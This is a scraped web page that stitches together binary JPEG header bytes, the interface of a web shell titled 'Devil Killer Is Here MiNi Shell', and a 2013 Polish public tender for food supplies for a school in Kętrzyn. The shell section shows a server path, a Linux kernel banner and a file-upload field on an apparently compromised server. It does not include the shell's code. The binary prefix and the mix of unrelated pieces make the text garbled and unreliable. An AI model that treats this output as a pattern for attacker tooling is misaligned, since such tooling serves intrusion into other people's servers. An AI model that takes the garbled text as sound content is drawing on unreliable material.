JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130814/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130814/329020-N-2013.html

<p class="kh_header"><b>Kętrzyn: Dostawa żywności dla Zespołu Szkół Centrum Kształcenia Rolniczego w Karolewie</b><br>
<b>Numer ogłoszenia: 329020 - 2013; data zamieszczenia: 14.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Centrum Kształcenia Rolniczego w Karolewie , Karolewo 12, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 89 7524753, faks 89 7524753.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.karolewo.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka administracji rządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności dla Zespołu Szkół Centrum Kształcenia Rolniczego w Karolewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 - Przyprawy sypkie i różne produkty spożywcze.

Lp.	Nazwa towaru	Jednostka miary	Planowana ilość
1	Ziele angielskie 20g	szt	320
2	Majeranek 20g	szt	85
3	Lisic laurowy 12 g	szt	193
4	Czosnek granulowany 20g	szt	55
5	Zioła prowansalskie 10g	szt	82
6	Pieprz naturalny mielony 20g	szt	288
7	Pieprz ziołowy 20g	szt	320
8	Kwasek cytrynowy 20g	szt	752
9	Cynamon mielony 20g	szt	20
10	Tymianek 10g	szt	82
11	Bazylia 10g	szt	65
12	Rozmaryn10g	szt	10
13	Oregano 10g	szt	31
14	Mąka ziemniaczana opakowanie torba papierowa 0,5kg	kg	25
15	Magii, opakowanie butelka szklana o pojemności 210g	szt	58
16	Przyprawa solno - warzywna typu Vegeta200g	szt	160
17	Przyprawa do ryb typu Delikat opakowanie puszka plastik o pojemności 600g	szt	18
18	Przyprawa do mięsa typu Delikat opakowanie puszka plastik o pojemności 700g	szt	18
19	Przyprawa do kurczaka typu Delikat opakowanie puszka plastik o pojemności 600g	szt	18
20	Koncentrat buraczany, opakowanie butelka szklana o pojemności 0,25l	szt	50
21	Aromat do ciasta	szt	10
22	Ketchup łagodny typu Pudliszki. Łowicz opakowanie butelka plastik o pojemności 480g	szt	276
23	Sol gruba z mikroelementami opakowanie folia o pojemności 1kg	szt	390
24	Kawa zbożowa instant opakowanie kartonik o pojemności 250g	szt	50
25	Herbata liściasta opakowanie folia o pojemności 100g	szt	385
26	Kakao naturalne , opakowanie kartonik o pojemności 150g	szt	50
27	Majonez 0,9 kg typu Kętrzyński 	szt	136
28	Makaron 0,5kg typu Lubella	szt	375
29	Cukier 1kg	kg	1140
30	Kasza jęczmienna pakowana 4x100g	op	102
31	Kasza gryczana pakowana 4x100g	op	164
32	Mąka pszenna typ 550 opakowanie torba papier o pojemności 1kg	kg	680
33	Płatki kukurydziane opakowanie torba folia o pojemności 0,5kg	szt	80
34	Ryz długoziarnisty kl I opakowanie torba papierowa o pojemności 1kg	kg	250
35	Olej 1l słonecznikowy 	szt	180
36	Olej 5l	szt	200
37	Koncentrat pomidorowy typu Łowicz, Pudliszki 0,9l	szt	176
38	Groszek konserwowy 460g	szt	150
39	Ogórki konserwowe 0,9l	szt	200
40	Ananas konserwowy	szt	60
41	Seler konserwowy opakowanie szklane o pojemności 350g	szt	50
42	Kukurydza konserwowa 400g	szt	150
43	Fasolka konserwowa biała 400g	szt	50
44	Szczaw konserwowy 0,9l	szt	20
45	Brzoskwinia puszka 	szt	35
46	Chrzan słoiczek 180g	szt	28
47	Cukierki mieszanka pakowane w kartonik 3kg	op	4
48	Cukier wanilinowy 32g	szt	15
49	Czekolada z orzechami laskowymi100g	szt	600
50	Dżem wieloowocowy niskosłodzony 270g	szt	523
51	Galaretka owocowa opakowanie torba folia 1kg	szt	17
52	Kasza jęczmienna 0,5kg 	szt	120
53	Kminek 20g	szt	20
54	Kompot wieloowocowy 0,9l	szt	112
55	Makaron nitka 3 kg	szt	40
56	Makaron gwiazdka 3kg	szt	10
57	Makaron kokardka 3kg	szt	40
58	Marmolada 0,9l	szt	70
59	Majonez 0,5l typu Kętrzyński	szt	78
60	Musztarda butelka plastik o, 25l	szt	40
61	Oliwa z Oliwek tłoczona na zimno opakowanie butelka szklana 1l	szt	25
62	Papryka słodka 20g	szt	100
63	Papryka ostra20g	szt	100
64	Płatki zbożowe czekoladowe 0,5kg	szt	100
65	Sos ogrodowy puszka typu Knorr	szt	8
66	Sos słodko - kwaśny typu Łowicz 0,9l	szt	50
67	Sos węgierski opakowanie puszka 1kg, dozowanie 120g l, wydajność 10l	szt	10
68	Woda mineralne gazowana 1,5l	szt	200
69	Krem czekoladowy 350g	szt	100
70	Kisiel 1kg	szt	20
71	Fix słodko-kwaśny 	szt	20
72	Fasolka czerwona puszka	szt	60
73	Margaryna Planta	szt	50
74	Mini kostka rosołowa	szt	50
75	Miód 460g	szt	50
76	Płatki kukurydziane typu Nesqik 500g	szt	100
76	Sok Kubuś 0,7l	szt	200
77	Sos czekoladowy do deserów 1l	szt	20
78	Baton czekoladowy 55g typu Mars 	szt	650
79	Fasola drobna paczka 5kg	Kg	250
80	Groch łupany paczka 5kg	Kg	150
81	Włoszczyzna suszona	Szt 	26
82	Zupa Żurek 1 kg	Szt	5
83	Zupa Barszcz biały 1kg	Szt	5
84	Rosół drobiowy1kg opakowanie wiaderko plastik	Szt	15
85	Migdały opakowanie folia 100g	Szt	30
86	Ziarna dynia opakowanie folia 100g	Szt	30
87	Ziarna słonecznik opakowanie folia 100g	Szt	30
			
88	  Placki ziemniaczane w proszku typu KNORR 1,5 kg	szt	80
89	Grzanki opakowanie 1 kg	szt	10
90	Sos borowikowy typu KNORR	szt	10
91	Cebulka prażona 0,5 kg	szt	100
92	Kakao rozpuszczalne 	szt	30
93	Powidła śliwkowe 270g	szt	50
94	Przyprawa do ziemniaków	szt	150


Część 2- Warzywa, owoce przetwory 

Lp	Nazwa towaru	Jednostka miary	Planowana ilość
1	Cebula biała, opakowanie w workach o pojemności 10 kg, świeża bez szczypioru, nienadmarznięta, bez uszkodzeń mechanicznych	Kg	720
2	Por czysty ,świeży	Kg	87
3	Marchew myta, świeża nienadmarznięta kl I	Kg	700
4	Pietruszka korzeń czysta myta, nienadmarznięta kl I	Kg	180
5	Seler korzeń czysty świeży nienadmarznięty	Kg	180
6	Burak czerwony czysty bez uszkodzeń mechanicznych, nienadmarznięty	Kg	750
7	Rzodkiewka - pecz czysta bez uszkodzeń mechanicznych	Szt	120
8	Kapusta biała główka 2-3 kg beż uszkodzeń mechanicznych, nienadmarznięta kl I	Szt	600
10	Kapusta biała młoda  główka o wadze 2-3 kg bez uszkodzeń mechanicznych nienadmarznięta kl I	Kg	840
11	Koper zielony świeży - pęczki kl I	Szt	100
12	Kapusta kwaszona opakowanie wiaderko plastikowe o pojemności 5 kg	Szt 	200
13	Kalafior biały świeży, czysty nienadmarznięty kl I	Szt	150
14	Kapusta czerwona, nienadmarznięta bez uszkodzeń mechanicznych, pakowana w worek o wadze 10 kg	Kg	595
15	Kapusta pekińska nienadmarznięta, bez uszkodzeń kl I opakowanie w w workach 5 kg	Kg	300
16	Natka pietruszki, czysta, pakowana w pęczki kl I	Szt	400
17	Ogórek świeży , kl I	Kg	560
18	Papryka czerwona świeża kl I nienadmarznięta kl I	Kg	100
19	Szczypior czysty świeży pakowany w pęczki	Szt	150
20	Sałata lodowa ,masłowa l I	Szt	400
21	Pieczarka biała świeża kl I	Kg	90
22	Grzyby suszone opakowanie folia 2 g	Szt 	50
23	Ogórki kwaszone opakowanie wiaderko 3kg	Szt 	150
24	Pomidor czerwony, klI, świeży nienadmarznięty, bez uszkodzeń mechanicznych	Kg	650
25	Ziemniaki, opakowanie worek o pojemności 10 kg nie zzieleniałe czyste, suche kl I irga 	Kg	12800
26	Cebula czerwona opakowanie worek 5kg 	Kg	150
27	Cukinia świeża 	Kg	80
28	Czosnek główka czysty , bez uszkodzeń kl I	Szt	71
29	Żurawina suszona opakowanie folia 1 kg	Kg	50
30	Kapusta wloska	kg	150
	Nazwa produktu spożywczego	Jednostka miary	Ilość
	OWOCE - kod 15300000-1		
31	Jabłka kruche,słodkie,czyste nienadmarznięte bez śladów uszkodzeń opakowanie skrzynka drewniana 15 kg	Kg	1440
32	Banany opakowanie karton 36 kg	op	94
33	Cytryna, 	Kg	90
34	Mandarynki	Kg	800
35	Gruszki	Kg	800
36	Pomarańcze	Kg	800
37	Nektarynki - kosz 	Op	150
38	Kompot 0,9l	Szt	80
39	Truskawki świeże, opakowanie łubianka o poj 2,5kg	Szt	90
40	Brzoskwinie 	Kg	300
41	Kiwi	Kg	300
42	Rodzynki	Szt	30
43	Winogrona 	Op	40
44	Śliwka suszona	Szt	40

Część 3 - Pieczywo i świeże wyroby piekarskie 

Lp	Nazwa towaru	Jednostka miary	Planowana ilość
1	Chleb razowy z dynią krojony opakowanie folia 0,5 kg	Szt	380
2	Bułki zwykłe, masa50g	Szt	2700
3	Bułki kajzerki ,masa 30g	Szt	4430
4	Bułki grahamki, masa 30g	Szt	740
5	Bułka z ziarnem, masa 30g	Szt	1250
6	Chleb zwykły krojony opakowanie folia0,6kg	Szt	4305
7	Bułka z nadzieniem, różnym	Szt	1200
8	Bułka tarta 0,5 kg	Szt	980
9	Bułka drożdżowa 0,5 kg	Szt	250
10	Bagietka mała	Szt	350

Część 4 - Dania gotowe - świeże

Lp	Nazwa towaru	Jednostka miary	Planowana ilośc
1	Kartacze z mięsem	kg	300
2	Pierogi z twarogiem, truskawką	kg	150
3	Pierogi wiejskie z miesem wieprzowym, ziemniakami	kg	300
4	Pierogi z kapustą i grzybami	kg	200
5	Uszka z miesem wieprzowo - wolowym	kg	150
6	Kopytka 	kg	250
7	Kopytka ze szpinakiem	kg	250

Część 5 - Jaja
Jaja kurze, kategoria wagowa XL 70-75 g, nie myte, nie popękane, termin ważności nie mniej niż 7 dni od daty dostawy, opakowanie jednorazowe - pakowane po 10 szt - 980 opakowań


Część 6 - Mleko i jego przetwory

Lp.	Nazwa towaru	Jednostka miary	Jednostka planowana
1	Twaróg półtłusty 250g zaw. tł.3,5%.Termin przydatności nie krótszy niż 7 dni od daty dostawy	Szt	457
2	Ser twardy zaw. tł 45%. Termin przydatności nie krótszy niż 30 dni od daty dostawy.	Kg	350
3	Ser topiony krążki op. 200g	Op	325
4	Ser topiony plastry op. 150g	op	325
5	Serek wiejski granulowany 150g.Termin przydatności nie krótszy niż 7 dni od daty dostawy	Szt	570
6	Ser typu Feta 	Szt	80
7	Masło extra zaw. tł 82% 200g.Termin przydatności nie krótszy niż 14 dni od daty dostawy.	Kg	600
8	Mleko opakowanie karton 1l zaw. tł 2%	Szt	1280
9	Śmietana 400g zaw. tł.18% .Termin przydatności nie krótszy niż 7 dni od daty dostawy.	Szt	800
10	Twaróg mielony naturalny wiaderko 1 kg 	Szt	92
11	Jogurt kubek 150g owocowy z widocznymi kawałkami owoców. Zawartość tl. od 0 - 1,5%. Termin przydatności nie krótszy niż 5 dni od daty dostawy.	Szt	1968
12	Jogurt Drink owocowy do picia	Szt	800
13	Serek homogenizowany o różnych smakach 150g.Termin przydatności nie krótszy niż 5 dni od daty dostawy 	Szt 	520
14	Ser Zotarella	Szt 	90
15	Rolada ustrzycka 	kg	50
16	Śmietanka 30% 1 l	Szt	60
17	Jogutr naturalny  400 g	Szt	150

Część 7- Mrożonki warzywne, ryby mrożone wędzone, konserwy rybne 

Lp.	Nazwa produktu	Jednostka miary	Jednostka planowana
1	Kalafior różyczka , opakowanie torba folia 2,5kg	Szt	80
2	Brokuł różyczka, opakowanie torba folia 2,5kg	Szt	80
3	Fasolka szparagowa cięta , opakowanie torba folia 2,5kg	Szt	120
4	Fasola szparagowa cała , opakowanie torba folia 2,5kg	Szt	60
5	Brukselka opakowanie torba folia 2,5kg	Szt	30
6	Mieszanka warzywna 7 składnikowa ,opakowanie torba folia2,5kg	Szt	80
7	Mieszanka warzywna trzy- składnikowa opakowanie torba foliowa 2,5kg	Szt	80
8	Mieszanka kompotowa wieloowocowa opakowanie torba folia 2,5kg	Szt	580
9	Podgrzybki mrożone folia 2,5 kg	Szt	40
10     Kurki mrożone op. folia 2,5 kg	Szt	10
11	 Frytki mrożone op. folia2,5 kg	Szt	10
	RYBY MROŻONE, WEDZONE, KONSERWY RYBNE kod - 152		
12 	Filet tilapia, sola, dorsz - kl I pakowane karton  5 - 10 kg	kg	650
13 	Makrela wędzona pakowana karton 3 kg	szt	150
14	 Śledź plat marynowane, wiaderka 3 kg	Szt	60
15	 Śledź małosolny wiaderko 4 kg 	Szt	10
16	 Śledź rolmops wiaderka 3 kg 	Szt	10
17	 Tuńczyk w oleju 160g	Szt	120
18	 ałatka rybna Neptun 160g	Szt	120
19	Śledź koreczki 	szt	60
20	Sałatka rybna - paprykarz 300g	Szt	120

Część 8 - Ciasto 

Lp.	Nazwa towaru	Jednostka miary	Jednostka planowana
1	Babeczki -mufinki	Szt	2200
2	Ciasto pieczone	Kg	160
3	Ciasta kruche pieczone	Kg	160
4	Ciasta śmietankowe	Kg	160
5	Pączki	Szt	540

Część 9 - Mięso wieprzowe, wołowe, podroby

Lp.	Nazwa towaru	Jednostka miary	Jednostka planowana
1	Schab środkowy bez skóry i bez kości	Kg	570
2	Mięso wieprzowe od kości szynki bez skóry i kości	Kg	250
3	Mięso wieprzowe bez skory i bez kości	Kg	230
4	Mięso mielone wieprzowe kl. I	Kg	690
5	Żeberka wieprzowe cięte	Kg	250
6	Wątroba wieprzowa	Kg	160
7	Mięso mielone wołowe	Kg	80
8	Słonina surowa bez skory	Kg	50
9	Smalec	Kg	300
10	Pręga wołowa	kg	30
11	Flak wołowy cięty 	kg	50
12	Golonka wieprzowa przednia 	kg	80
13	Pachwina wieprzowa	kg	50
14	Podgardle wieprzowe	kg	60
15	Boczek surowy	kg	60


Część 10 - Mięso drobiowe, wędliny, wieprzowe, wołowe, konserwy 

Lp.	Nazwa towaru	Jednostka miary	Planowana ilość
1	Ćwiartka kurczaka	Kg	650
2	Filet drobiowy bez skory i kości	Kg	480
3	Noga kurczaka	Kg	250
4	Korpusy z kurczaka ze skrzydełkiem	kg	500
5	Szyje indycze 	kg	20
6	Filet z indyka	kg	120
7	skrzydełka	kg	150
	WĘDLINY - kod 15131130-5		
8	Filet wędzony z indyka	Kg 	80
9	Blok mięsny	kg	30
10	Kaszanka	Kg	180
11	Kiełbasa z karczmy	kg	70
12	Kiełbasa zwyczajna	Kg 	90
13	Kiełbasa podwawelska	Kg	120
14	 Kiełbasa staropolska	Kg	20
15	Kiełbasa biała parzona	Kg	100
16	Konserwa mięsna 300g - typu gulasz angielski	Szt	300
17	Krakowska sucha	Kg	50
18	Karczek opiekany 	Kg	80
19	Mortadela drobiowa	Kg	115
20	Ogonówka z kotła	Kg	40
21	Łopatka pieczona	Kg	40
22	Parówka domowe	Kg	260
23	Pasztet 0,50 g 	Szt	600
24	Pasztet pieczony z indyka	Kg	100
25	Pierś opiekana z indyka opakowanie folia	Kg	60
26	Pierś wędzona z indyka opakowanie folia	Kg	50
27	Podgardla wędzone 	Kg	20
28	Polędwica miodowa opakowanie folia o pojemności 1,5 - 2 kg	Kg 	45
29	Schab kasztelański opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
30	Schab krotoszyński opakowanie folia o pojemności 1,5 - 2 kg	Kg 	30
31	Schab cygański opakowanie folia o pojemności 1,5 - 2kg	Kg	65
32	Schab z pieca opakowanie folia o pojemności 1,5 - 2 kg	Kg	45
33	Serdelki bydgoskie opakowanie folia 	Kg 	150
34	Polędwica sopocka opakowanie folia o pojemności 1,5 - 2kg	Kg	50
35	Szynka staropolska opakowanie folia o pojemności 1,5 - 2 kg	Kg	40
36	Szynka domowa opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
37	Szynka Mistrza Jana opakowanie folia o pojemności 1,5 -2 kg	Kg
	60
38	Szynka kasztanowa opakowanie folia o pojemności 1,5 - 2 kg	Kg	80
39	Szynka wędzona opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
40	Szynka od zawsze opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
41	Szynka Trójkąt opakowanie folia o pojemności 1,5 - 2 kg	Kg	20
42	Udziec wędzony z kurczaka opakowanie folia o pojemności 1,5 - 2 kg	Kg	28
43	Tyrolska opakowanie folia o pojemności 1,5 -2kg	Kg	50
44	Wędzonka mazurska opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
45	Wieprzowina biała opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
46	Boczek wędzony	kg	40
47	Kaszanka	kg	180
48	Baleron gotowany	kg	30
49	Kindziuk Litewski	kg	30.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 11.53.00.00-1, 15.81.00.00-9, 15.89.43.00-4, 03.14.25.00-3, 15.50.00.00-3, 15.33.11.70-9, 15.20.00.00-0, 15.81.22.00-5, 15.11.30.00-3, 15.11.10.00-9, 15.11.40.00-0, 15.11.20.00-6, 15.13.11.30-5, 15.13.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi zawierać:
a) wypełniony formularz oferty - zał. nr 1 do SIWZ,(odrębnie dla każdej części zmówienia)
b) wypełniony formularz cenowy - zał. nr 1a) do SIWZ (odrębnie dla każdej części zmówienia)
c) parafowany na każdej stronie wzór umowy (odrębnie dla każdej części zmówienia)
d) dokumenty i oświadczenia potwierdzające spełnianie przez wykonawcę warunków udziału w postępowaniu (wymienione w pkt 6 SIWZ),
